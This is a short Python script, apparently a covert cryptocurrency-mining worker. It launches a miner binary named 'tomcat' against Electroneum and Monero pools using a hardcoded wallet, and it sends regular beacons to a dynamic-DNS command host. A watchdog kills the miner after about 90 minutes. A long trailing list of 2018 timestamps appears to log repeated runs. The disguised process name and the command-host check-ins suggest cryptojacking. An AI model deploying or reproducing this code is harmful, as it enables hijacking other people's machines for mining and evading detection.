import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:36:05.817468
#2018-02-17 17:24:01.625159
#2018-02-17 19:12:07.079372
#2018-02-17 21:02:07.281785
#2018-02-17 22:47:05.278739
#2018-02-18 00:31:06.795110
#2018-02-18 02:21:05.200690
#2018-02-18 04:08:04.923333
#2018-02-18 05:59:03.781339
#2018-02-18 07:48:04.453117
#2018-02-18 09:36:05.104101
#2018-02-18 11:21:06.741522
#2018-02-18 13:07:05.700349
#2018-02-18 14:56:05.087297
#2018-02-18 16:44:05.473982
#2018-02-18 18:33:04.779819
#2018-02-18 20:20:08.337940
#2018-02-18 22:06:06.457014
#2018-02-18 23:53:07.067141
#2018-02-19 01:40:07.686112
#2018-02-19 03:28:05.601756
#2018-02-19 05:13:04.007217
#2018-02-19 06:58:06.914503
#2018-02-19 08:45:07.114918
#2018-02-19 10:33:07.300658
#2018-02-19 12:22:02.000104
#2018-02-19 14:10:08.837957
#2018-02-19 15:58:06.901977
#2018-02-19 17:48:09.729760
#2018-02-19 19:34:08.230492
#2018-02-19 21:23:01.269213
#2018-02-19 23:08:08.206716
#2018-02-20 00:55:03.026207
#2018-02-20 02:43:04.229723
#2018-02-20 04:32:02.185597
#2018-02-20 06:16:04.614194
#2018-02-20 08:00:10.093503
#2018-02-20 09:45:09.526100
#2018-02-20 11:29:06.019686
#2018-02-20 13:16:01.323552
#2018-02-20 15:00:12.986228
#2018-02-20 16:44:05.188351
#2018-02-20 18:33:05.890867
#2018-02-20 20:23:02.057892
#2018-02-20 22:07:08.548048
#2018-02-20 23:49:05.504935
#2018-02-21 01:33:05.025821
#2018-02-21 03:20:08.080664
#2018-02-21 05:09:03.612346
#2018-02-21 06:56:06.632866
#2018-02-21 08:43:01.847092
#2018-02-21 10:28:05.305555
#2018-02-21 12:17:08.946118
#2018-02-21 14:05:05.074548
#2018-02-21 15:49:08.299649
#2018-02-21 17:41:01.868152
#2018-02-21 19:27:05.981732
#2018-02-21 21:16:06.412572
#2018-02-21 23:02:05.167345
#2018-02-22 00:51:02.131253
#2018-02-22 02:38:06.095630
#2018-02-22 04:23:06.936639
#2018-02-22 06:11:08.680626
#2018-02-22 07:55:05.893809
#2018-02-22 09:44:02.215538
#2018-02-22 11:30:10.441425
#2018-02-22 13:17:01.952541
#2018-02-22 15:06:04.332786
#2018-02-22 16:49:09.025248
#2018-02-22 18:38:08.534776
#2018-02-22 20:31:04.860235
#2018-02-22 22:16:09.003198
#2018-02-23 00:02:08.443179
#2018-02-23 01:52:02.088008
#2018-02-23 03:39:08.543064
#2018-02-23 05:24:05.981642
#2018-02-23 07:09:06.262587
#2018-02-23 08:58:07.580081
#2018-02-23 11:15:10.368623
#2018-02-23 13:10:09.855637
#2018-02-23 14:54:07.369346
#2018-02-23 16:44:10.893430
#2018-02-23 18:31:04.354198
#2018-02-23 20:16:07.438051
#2018-02-23 22:06:04.114196
#2018-02-23 23:54:05.619912
#2018-02-24 01:43:05.341352
#2018-02-24 03:40:06.192230
#2018-02-24 05:23:01.285578
#2018-02-24 07:11:01.923698
#2018-02-24 09:00:04.891172
#2018-02-24 10:40:08.676456
#2018-02-24 12:32:05.256547
#2018-02-24 14:21:01.925884
#2018-02-24 16:08:05.831894
#2018-02-24 17:59:07.152604
#2018-02-24 19:47:03.436969
#2018-02-24 21:32:04.101371
#2018-02-25 01:58:06.338875
#2018-02-25 05:51:05.257245
#2018-02-25 11:37:07.801079